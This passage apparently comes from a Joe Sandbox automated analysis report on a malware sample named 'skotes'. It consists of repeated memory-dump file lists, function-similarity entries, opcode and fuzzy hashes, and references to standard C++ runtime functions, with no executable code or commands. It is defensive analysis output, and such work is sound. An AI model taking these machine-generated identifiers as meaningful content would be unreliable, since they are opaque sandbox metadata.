                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 1319684358-0
                                                          • Opcode ID: af397e1ae36dc63760e34cc53d06fce0554d3ff8ac5af839f212383dc16a8fcb
                                                          • Instruction ID: 6d36f036fec9afbf9e833e523bc57af967ff9b9564de0525a5cd2d520afc3d20
                                                          • Opcode Fuzzy Hash: af397e1ae36dc63760e34cc53d06fce0554d3ff8ac5af839f212383dc16a8fcb
                                                          • Instruction Fuzzy Hash: 3B318E75A001098BCB14DFA8C8415BDB7F5EF09310B2440B9EA65E7360DB34DE0A8BA1
                                                          APIs
                                                          • _SpinWait.LIBCONCRT ref: 00BFEEBC
                                                          • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00BFEEC8
                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00BFEEE1
                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00BFEF0F
                                                          • Concurrency::Context::Block.LIBCONCRT ref: 00BFEF31
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                          • String ID:
                                                          • API String ID: 1182035702-0
                                                          • Opcode ID: 73f1c625ef5315b51b6659b13b212454d8b25c8dd327fcb64370e251e724cbd2
                                                          • Instruction ID: b6bb08daf9b062f2c5dde4471f23941a5f129d9205c22ed7a9282130b842f1b8
                                                          • Opcode Fuzzy Hash: 73f1c625ef5315b51b6659b13b212454d8b25c8dd327fcb64370e251e724cbd2
                                                          • Instruction Fuzzy Hash: B5212D7081421D8EEF25DFA4C8456FEB7F1EF15320F2005A9E261A71E1E7B19A48CA51
                                                          APIs
                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00C11B57
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C11B66
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C11C2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                          • String ID: pContext$switchState
                                                          • API String ID: 2656283622-2660820399
                                                          • Opcode ID: 86e15fa51e374486323d1a4c723d6565d8d04c5f273e1b2eca4567b031ba2287
                                                          • Instruction ID: ab5209c9808a45e1439e26162f3fd31f5b7b5c7400f65b9e81282971daf8e718
                                                          • Opcode Fuzzy Hash: 86e15fa51e374486323d1a4c723d6565d8d04c5f273e1b2eca4567b031ba2287
                                                          • Instruction Fuzzy Hash: 6331E575A002149BCF04EF64C891AEDB3B5EF46320F284565EE2197281EB38EE45EBD0
                                                          APIs
                                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00C14E6D
                                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00C14E86
                                                          • PMDtoOffset.LIBCMT ref: 00C14EAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindInstanceTargetType$Offset
                                                          • String ID: Bad dynamic_cast!
                                                          • API String ID: 1467055271-2956939130
                                                          • Opcode ID: db1731f522d045e67789d50a3b171b1029e2716393ffca6ab79cd21c91379e62
                                                          • Instruction ID: 10786cdd3e10bb18108b29067f62470a7b0e00399d3df42f4961b14c3ef5b86e
                                                          • Opcode Fuzzy Hash: db1731f522d045e67789d50a3b171b1029e2716393ffca6ab79cd21c91379e62
                                                          • Instruction Fuzzy Hash: 69210B72A04205AFCF1CDFA4DD46EEAB7B8FF46720F108569F91197280D731EA81B690
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          • Opcode ID: ec24489adb29c91f5a34bd2e6c5dd07cf24db92fdbac4c2f53d42428bfd970f8
                                                          • Instruction ID: a15da907a3abb99e8de398d37b15df5b9e0f0a1e4f9154deb465956c1a3e41dc
                                                          • Opcode Fuzzy Hash: ec24489adb29c91f5a34bd2e6c5dd07cf24db92fdbac4c2f53d42428bfd970f8
                                                          • Instruction Fuzzy Hash: A601D67771CA26256A152059AD03BE613A88BC3BB4B26022AFC74F76D1EF54DDC271E0
                                                          APIs
                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00BFFB06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
